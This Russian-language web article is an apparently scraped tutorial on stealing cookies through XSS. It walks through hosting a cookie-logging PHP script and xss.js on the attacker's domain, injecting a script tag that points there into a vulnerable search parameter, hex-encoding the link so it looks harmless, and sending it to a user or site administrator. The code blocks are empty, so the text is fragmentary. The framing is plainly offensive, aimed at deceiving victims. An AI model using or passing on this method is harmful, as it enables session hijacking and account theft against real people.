Хелпикс

Главная

Контакты

Случайная статья





Кодирование и декодирование ссылок



3 Этап

Теперь создадим еще один файл с любым названием, например, «xss. php» и напишем в нем:

Код:

Этот скрипт будет записывать дату и полученные cookie в файл cookies. txt

4 Этап

После выполнения 2-го и 3-го этапа, загрузим созданные нами два файла в корень нашего сайта. Файлы должны быть доступны, например, по таким адресам: «http: //ВАШ_ДОМЕН/xss. js» и «http: //ВАШ_ДОМЕН/xss. php».

5 Этап

Ну теперь самое сложное, найдем сайт с XSS уязвимостью, например, тут: «http: //site. ru/find. php? find=[xss]». Уязвимость обнаружили, теперь пошлем скрипту find. php следующий запрос:

Код:

и затем открываем созданный файл «cookies. txt» с украденными cookie.

Кодирование и декодирование ссылок

Для чего это нужно?

По понятным причинам в открытую нашу ссылку кидать не стоит, слишком уж она бросается в глаза. Для повышения шанса нажатия по нашей ссылке мы ее закодируем, для этого создадим кодировщик и декодировщик.

Кодировщик

Создадим файл для кодирования символов в hex. Назовем файл, например, так «hex. php» и запишем в него следующий код:

Код:

Декодировщик:

           Ну а, чтобы вернуть ссылку в нормальный читабельный вид, напишем декодировщик, назовем его, например, «hex. php» и внесем следующий код:

Код:

Как это работает:

Рассмотрим работу на наглядном примере. Для xss-атаки, нам нужно чтобы жертва перешла к примеру, по этой ссылке «http: //site. ru/find. php? find=< script src=http: //ВАШ_ДОМЕН/xss. js> < /script> », но как уже писалось ранее, в открытую ее кидать глупо, для этого мы и используем наш скрипт в файле «hex. php».

    Закодируем xss код из приведенной выше ссылки:

Код:

После чего, получим следующее hex представление:

Код:

 

 

Теперь наша ссылка будет выглядеть вот так:

Код:

Как видно, теперь ссылка практически не вызывает подозрения, и выбранная жертва скорее всего на нее нажмет.

Теперь осталось скинуть эту ссылку какому-нибудь пользователи или администратору сайта «site. ru» и дождаться его cookie, если конечно они там используются.

Куки могут быть переданы в hex-виде, для этого придется воспользоваться декодером «unhex. php».

Для большей скрытности, можем еще «xss. js», также пропустить через кодировщик «hex. php».

Подведем итоги

Теперь у нас с вами есть полноценные скрипты для проведения XSS-атак. Но нужно понимать, что данный метод атаки является довольно старым и найти эту уязвимость будет все сложнее и сложнее. Для современных CMS данный способ атаки будет бесполезным и подойдет скорее всего только для самописных кабинетов не опытных программистов.



  

© helpiks.su При использовании или копировании материалов прямая ссылка на сайт обязательна.